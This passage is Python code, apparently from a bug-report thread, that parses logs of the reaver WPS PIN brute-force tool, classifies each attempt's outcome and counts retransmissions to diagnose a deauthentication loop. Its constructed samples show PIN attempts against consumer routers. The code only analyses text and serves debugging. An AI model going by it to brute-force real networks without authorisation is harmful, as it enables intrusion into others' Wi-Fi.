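        # The enrollee answered M4 with a NACK: the exchange ran to completion.
        if self.count("Received WSC NACK"):
            return "negotiated"
        # reaver gave up on EAPOL START and re-queued the same PIN.
        if self.count("successive start failures"):
            return "eapol-start-failures"
        # The AP deauthenticated us and reaver never got past EAPOL START:
        # the retransmit loop this issue is about.
        if self.count("Received deauth request") and not self.count("Received identity request"):
            return "stuck-after-deauth"
        return "incomplete"


def split_attempts(log: str) -> list:
    """Cut the log at every 'Trying pin' line; lines before the first PIN are dropped."""
    attempts = []
    for line in log.splitlines():
        m = PIN_RE.match(line)
        if m:
            attempts.append(Attempt(m.group(1)))
        elif attempts:
            attempts[-1].lines.append(line)
    return attempts


def summarize(log: str) -> dict:
    attempts = split_attempts(log)
    return {
        "attempts": len(attempts),
        "distinct_pins": len({a.pin for a in attempts}),
        "outcomes": dict(Counter(a.outcome() for a in attempts)),
        "eapol_start_requests": sum(a.count("Sending EAPOL START request") for a in attempts),
        "retransmissions": sum(a.count("resend_last_packet") for a in attempts),
    }


# --- constructed samples (abridged from the thread) ---------------------------
_ASSOC_TPLINK = "[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)\n"
_EXCHANGE_OK = (
    "[+] Sending EAPOL START request\n"
    "[+] Received identity request\n"
    "[+] Sending identity response\n"
    "[+] Received M1 message\n"
    "[+] Sending M2 message\n"
    "[+] Received M3 message\n"
    "[+] Sending M4 message\n"
    "[+] Received WSC NACK (reason: 0x0000)\n"
    "[+] Sending WSC NACK\n"
)
_TIMEOUTS = "[+] Sending EAPOL START request\n[!] WARNING: Receive timeout occurred\n" * 5
_START_FAILURE = _TIMEOUTS + (
    "[!] WARNING: 5 successive start failures\n"
    "[+] Sending EAPOL START request\n"
    "[+] Sending WSC NACK\n"
    "[!] WPS transaction failed (code: 0x02), re-trying last pin\n"
)


def _attempt(pin: str, body: str) -> str:
    return f'[+] Trying pin "{pin}"\n' + _ASSOC_TPLINK + body


# External association: every other attempt fails at EAPOL START and is retried.
SAMPLE_EXTERNAL_ASSOC = (
    _attempt("12345670", _EXCHANGE_OK)
    + _attempt("00005678", _START_FAILURE) + _attempt("00005678", _EXCHANGE_OK)
    + _attempt("01235678", _START_FAILURE) + _attempt("01235678", _EXCHANGE_OK)
)

# Deauth during the WPS transaction: only retransmissions until Ctrl-C.
_RESEND = "send_packet called from resend_last_packet() send.c:161\n"
SAMPLE_DEAUTH_STUCK = (
    '[+] Trying pin "00005678"\n'
    "[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)\n"
    "[+] Sending EAPOL START request\n"
    "send_packet called from send_eapol_start() send.c:48\n"
    + _RESEND + "[+] Received deauth request\n" + _RESEND * 3
    + "[!] WARNING: Receive timeout occurred\n"
    "[+] Sending EAPOL START request\n"
    "send_packet called from send_eapol_start() send.c:48\n"
    "[+] Received deauth request\n" + _RESEND * 2
    + "^Csend_packet called from send_termination() send.c:142\n\n[+] Session saved.\n"
)

if __name__ == "__main__":
    for name, log in (("external assoc", SAMPLE_EXTERNAL_ASSOC), ("deauth", SAMPLE_DEAUTH_STUCK)):
        print(name, summarize(log))
```

Run on a real `reaver -vvv` session log instead of the samples, the `eapol_start_requests` to `attempts` ratio shows what feitoi measured (here 15 start requests for 3 distinct PINs), and a `stuck-after-deauth` outcome with a high `retransmissions` count is the signature of the loop this issue reports.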